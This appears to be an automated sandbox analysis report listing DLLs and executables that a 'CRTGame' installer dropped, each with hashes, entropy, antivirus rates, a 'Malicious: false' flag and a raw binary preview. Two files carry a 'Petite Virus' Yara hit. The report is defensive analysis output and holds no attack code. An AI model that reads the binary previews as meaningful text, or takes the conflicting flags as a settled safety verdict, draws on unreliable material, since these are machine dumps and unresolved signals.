SSDEEP:	192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
MD5:	19E08B7F7B379A9D1F370E2B5CC622BD
SHA1:	3E2D2767459A92B557380C5796190DB15EC8A6EA
SHA-256:	AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
SHA-512:	564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...\|.

C:\Program Files (x86)\CRTGame\bin\x86\is-B8HMN.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	5.173769974589746
Encrypted:	false
SSDEEP:	192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
MD5:	9C55B3E5ED1365E82AE9D5DA3EAEC9F2
SHA1:	BB3D30805A84C6F0803BE549C070F21C735E10A9
SHA-256:	D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
SHA-512:	EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-C739G.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	5.1208137218866945
Encrypted:	false
SSDEEP:	24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:	B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:	2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:	D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:	962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:	false
Preview:	Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11532
Entropy (8bit):	7.219753259626605
Encrypted:	false
SSDEEP:	192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
MD5:	073F34B193F0831B3DD86313D74F1D2A
SHA1:	3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
SHA-256:	C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
SHA-512:	EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite.............................`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\...S...s..$..........o..y..........,.........-..X.....v.M1..'...5R.4..8k!..q.=BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z..).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re

C:\Program Files (x86)\CRTGame\bin\x86\is-C9QMS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17472
Entropy (8bit):	7.524548435291935
Encrypted:	false
SSDEEP:	384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
MD5:	7B52BE6D702AA590DB57A0E135F81C45
SHA1:	518FB84C77E547DD73C335D2090A35537111F837
SHA-256:	9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
SHA-512:	79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........\|...CC.......p......n....<.......`..............lH......)...............

C:\Program Files (x86)\CRTGame\bin\x86\is-CA2OV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	867854
Entropy (8bit):	4.9264497464202694
Encrypted:	false
SSDEEP:	12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
MD5:	B476CA59D61F11B7C0707A5CF3FE6E89
SHA1:	1A1E7C291F963C12C9B46E8ED692104C51389E69
SHA-256:	AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
SHA-512:	D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p..........................................................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc..........,..................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-CKJ1G.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.423554884287906
Encrypted:	false
SSDEEP:	6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
MD5:	67247C0ACA089BDE943F802BFBA8752C
SHA1:	508DA6E0CF31A245D27772C70FFA9A2AE54930A3
SHA-256:	BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
SHA-512:	C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-D14K1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	227328
Entropy (8bit):	6.641153481093122
Encrypted:	false
SSDEEP:	6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
MD5:	BC824DC1D1417DE0A0E47A30A51428FD
SHA1:	C909C48C625488508026C57D1ED75A4AE6A7F9DB
SHA-256:	A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
SHA-512:	566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-DFCBR.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	123406
Entropy (8bit):	6.263889638223575
Encrypted:	false
SSDEEP:	1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
MD5:	B49ECFA819479C3DCD97FAE2A8AB6EC6
SHA1:	1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
SHA-256:	B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
SHA-512:	18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................\|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-DMP2Q.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26126
Entropy (8bit):	6.048294343792499
Encrypted:	false
SSDEEP:	384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:	D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:	C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:	E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:	7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-EI0VO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315918
Entropy (8bit):	6.5736483262229735
Encrypted:	false
SSDEEP:	6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
MD5:	201EA988661F3D1F9CA5D93DA83425E7
SHA1:	D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
SHA-256:	4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
SHA-512:	6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-EI90O.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	266254
Entropy (8bit):	6.343813822604148
Encrypted:	false
SSDEEP:	3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
MD5:	8B099FA7B51A8462683BD6FF5224A2DC
SHA1:	C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
SHA-256:	438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
SHA-512:	9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-EQ4MD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	906766
Entropy (8bit):	6.450201653594769
Encrypted:	false
SSDEEP:	24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
MD5:	AF785965AB0BF2474B3DD6E53DA2F368
SHA1:	EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
SHA-256:	8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
SHA-512:	5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................\|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..\|;.......<..................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-FBHLC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	772608
Entropy (8bit):	6.546391052615969
Encrypted:	false
SSDEEP:	6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:	B3B487FC3832B607A853211E8AC42CAD
SHA1:	06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:	30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:	FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

C:\Program Files (x86)\CRTGame\bin\x86\is-FJDCA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-GKK7D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	16910
Entropy (8bit):	5.289608933932413
Encrypted:	false
SSDEEP:	384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
MD5:	2F040608E68E679DD42B7D8D3FCA563E
SHA1:	4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
SHA-256:	6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
SHA-512:	718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......\|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..\|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-GRQ3N.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68042
Entropy (8bit):	6.090396152400884
Encrypted:	false
SSDEEP:	768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
MD5:	5DDA5D34AC6AA5691031FD4241538C82
SHA1:	22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
SHA-256:	DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
SHA-512:	08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-GSP1P.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	648384
Entropy (8bit):	6.666474522542094
Encrypted:	false
SSDEEP:	12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:	CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:	56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:	A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:	03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-GUEH6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	6.232860260916194
Encrypted:	false
SSDEEP:	768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
MD5:	B162992412E08888456AE13BA8BD3D90
SHA1:	095FA02EB14FD4BD6EA06F112FDAFE97522F9888
SHA-256:	2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
SHA-512:	078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram\|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-HI2BI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	240654
Entropy (8bit):	6.518503846592995
Encrypted:	false
SSDEEP:	6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:	4F0C85351AEC4B00300451424DB4B5A4
SHA1:	BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:	CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:	80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
